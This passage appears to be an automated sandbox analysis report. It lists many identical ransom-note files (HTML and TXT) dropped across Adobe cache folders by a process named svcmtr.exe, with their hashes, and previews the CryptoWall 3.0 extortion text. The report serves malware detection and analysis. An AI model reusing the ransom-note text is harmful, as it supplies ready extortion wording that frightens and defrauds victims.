                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
